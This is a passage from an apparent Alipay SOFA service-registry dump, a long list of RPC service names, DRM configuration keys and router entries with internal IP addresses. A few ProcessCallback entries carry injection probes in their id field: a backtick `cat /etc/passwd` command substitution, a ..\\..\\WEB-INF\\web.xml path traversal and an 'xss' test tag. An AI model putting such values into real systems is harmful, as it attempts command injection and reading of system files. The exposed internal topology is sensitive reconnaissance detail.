TRANSMIT_ACMANTYIXIN#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MESHYSALE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.IndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.ordercenter.facade.service.HuanxuMasterDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.remit.RemitInquiryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.shadowHAValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pcardsales:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","id.dana.bizcenter.common.service.facade.result.bizgoodsmanage.BizAggrGoodsCreateResult:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.220.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_FINPROMO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acquotacore.facade.QuotaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.FundQuotationGzoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smsgw.common.service.facade.SmsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fundboss.common.service.facade.risk.FundRiskMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openaccess.facade.service.cert.CertService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antflow.common.service.facade.DataCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.gfas.gfasShareDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:pcreditpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.72.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileapp.common.service.facade.taobao.TaobaoTokenLoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_RULECENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dayu.facade.service.CallTreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchselfop.common.service.ooda.facade.OodaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppConfManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.29.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.contentlib.common.service.facade.vtask.TaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.189.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.recommendNewTabStarNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.service.facade.AutoInsCompanyCooperationBizModelFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmKeyInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPService:1.0:process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINCONSUMEPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:emcplan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.clearChkDataConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityidentify.service.privacyquestion.PrivacyQuestionCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.LuckyDrawManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.core.service.decision.FinanceChannelSwitch.switchAll,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.antha.AnthaClientUpdateDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.credit.AgdsSellerCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.128.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.adaptive,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.BusinessCustomizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:fcinstassetmng_changePlanCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartscene.common.facade.revopt.RecommendServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmTairVersionManager.cdsConfVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.common.service.facade.api.reindeer.PolicyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.PersonasAmendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdUnitInstService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@imaspmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.ipay.ipromotion.common.service.facade.api.campaign.CampaignApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.DataImportAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexTradeBatchVerifyFacadeTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ACCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iriskmerchant.common.service.integration.collection.CollectionHBaseClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:xss3927test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cachecore.drm.GeneralCacheSwitch.chargetbasecache.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.dataaccess.DataAccessPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.PropertyValueManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.biz.shared.manager.MainTaskManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:apires@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.distribute.ContentSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.core.data.task.impl.OverTimeOrderQueryTask:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antreplay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.ChannelLeadsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.102.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.KbsearchDrmConfigImpl.searchBizTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.integration.finbaservice.PartnerManageServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.hainaprod.common.service.facade.api.appservice.AppServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minitrans.service.facade.agentfund.api.AftransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.decoration.PublicDecorationOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.manage.KbdishSpecConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.CommonAnswerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.88.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_GFFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.giftprod.common.service.facade.MerchantReceiveWSService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.75.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.biz.cashing.service.CashingProductPublishSuccessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmemberprod.common.service.facade.api.tr.signin.SignInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.cscheck.CsCheckTaskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdFieldFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.AuthorizationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fiscore.common.service.facade.callback.FiscoreCallBackService:1.0:tradecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecuPlateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdispute.facade.api.ProcessActionLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartsql.service.facade.service.ClusterService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscommunity.common.service.facade.ContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.config.AutoMktAreaConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.wireless.IsvSuiteTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.ApiNotifyExtFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.disclose.RccenterDiscContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstprod.common.service.facade.api.orgdecision.OrgControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_QUOTVILLA#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.message.MessageSubQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finassetpreference.api.facade.FapBizEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.UserActionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.118.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.tmallpcard.api.TmallPCardtransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.integration.chngservice.proto.query.OpsQueryService:1.0:ocp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamweb.common.service.facade.common.CacheServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.datasecurity.interfaces.facade.api.classify.SecurityClassifyService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.invoice.InvoiceServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afx.tr.server.facade.SampleGenericService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kborderprod.KopOrderReverseSerive:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:scanRunnableInstanceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.manage.facade.RouteTryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.org.BusinessRoleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.agds.GeneralPledgedLoanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.query.api.AccenterTitleEntryQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.facade.api.shopkeeper.info.ShopkeeperInfoQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.recon.common.service.facade.api.SettlementAllocateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.changecore.AdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.UserServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.StreamMetaTableService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.trans.api.RefundServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingMessageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.139.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.poscore.finDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.zpaas.zappinfo.facade.query.ArchDomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.39.192.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dceptrans.ldctrservice.BalanceWarnService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mobilegeocoding:name=com.alipay.mobilegeocoding.core.service.drm.DistrictVersionResource.versionFileStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iopencore.common.service.manager.FieldDictDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.manage.KbdishCatetoryConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACIAASCONNECTORCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.carworld.AutoMktCarWorldFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","AUTOINSPROD-SCHEDULER-S_autoinsprod_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zpaas.facade.api.OrderInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:sesameCredit_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.ContentMaintenanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.ContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.issue.IssueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:pointcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdSceneBizprodService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.228.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rulemng.common.service.facade.rule.TraditionRuleManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.210.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.CfpSpecialWithdrawQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.cashier.common.service.facade.api.PaymentResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.analysis.AnalysisClientChangeRecordV2DomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:alipayuserservice-with-session-domain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.almcenter.service.facade.api.cashpool.AlmCashPoolRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.api.StagedFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.ssu.SsuQueryFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:dtbank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.inspect.search.MstSearchGraspResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.account.ContentAppArticleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:`cat /etc/passwd`@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.CampPageInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.common.MapDao:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_DEMO_SOFA3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sportsprod.teleport.channel.protocol.TeleportTrSelfService:1.0:charityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.shop.ShopFeeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.warn.facade.wpbizrule.WpBizRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.gather.common.facade.core.version.service.GatherVersionOpenService:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTDISPUTE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igpayrouter.common.service.facade.RouterSpiCallback:1.0:igpayrouter_out@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.FileUploadManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:openinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msgopprod.common.service.facade.authority.AuthCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","pcinstdata@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:dacuprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.HostnameSeqFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.openapi.ConfigOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.uemprod.artisan.facade.WidgetServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:investtrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.reachshop.AmapShopManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:infosectask_user_punishServiceProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:cn.com.antcloud.acorchestracore.facade.SchedulerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insclaimdecision.common.service.InsClaimRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.risk.service.RiskTestManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:financingAsset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.InstSpAccountManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:afrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_XL_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradequery.common.service.facade.TradeChargeQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.40.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmclifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:..\\..\\WEB-INF\\web.xml@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.92.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alcorporation.common.service.facade.api.AlCorpConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.spi.task.TaskExecuteCBFacade:1.0:intimaterelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.shop.MrchProdShopFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:isdsp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudprod.facade.defense.OpsCldDefenseDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.dback.api.DbackInstructionBatchQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.ItemInventoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.33.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insautomarket.common.facade.camp.AutoPromoCampFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOF